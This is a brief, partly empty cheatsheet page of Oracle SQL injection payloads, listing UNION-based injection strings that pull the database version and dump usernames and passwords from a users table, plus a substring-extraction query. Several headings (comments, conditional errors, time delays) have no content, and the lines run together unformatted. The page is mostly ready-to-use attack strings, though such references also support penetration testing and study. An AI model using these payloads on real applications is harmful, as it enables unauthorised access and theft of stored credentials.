Basic Oracle SQLi Cheatsheet
Oracle SQl Injection Cheatsheet
Retrieving Database version
SELECT banner FROM v$versionSELECT version FROM v$instance' UNION SELECT NULL,banner FROM v$version -- -' UNION SELECT NULL,version FROM v$versionString Concatenation
'string1' || 'string2'SELECT username || ":" || password FROM users;' UNION SELECT NULL,username || ":" || password FROM Users -- -Substring
SELECT SUBSTR(password,2,1) FROM users Comments
Database Contents
Conditional Errors
Time delays
Conditional Time delays
Last updated